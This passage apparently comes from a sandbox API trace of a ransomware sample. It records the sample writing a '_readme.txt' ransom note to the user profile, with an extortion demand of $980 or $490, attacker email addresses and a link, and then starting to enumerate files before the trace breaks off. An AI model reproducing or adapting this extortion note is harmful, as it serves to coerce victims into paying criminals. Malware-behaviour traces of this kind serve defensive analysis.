HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32165f0 | out: hHeap=0x660000) returned 1 [0056.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.377] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0056.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.377] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.377] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.377] PathFindFileNameW (pszPath="") returned="" [0056.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.377] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.377] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.377] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.377] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.378] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0056.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.378] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 0 [0056.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.378] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.378] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5e2e0 [0056.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.378] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.378] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.379] CloseHandle (hObject=0x5c8) returned 1 [0056.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0056.380] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0056.380] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ece8a70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ece8a70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.380] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261790 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260b30 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328eef0 [0056.380] RtlAllocateHeap 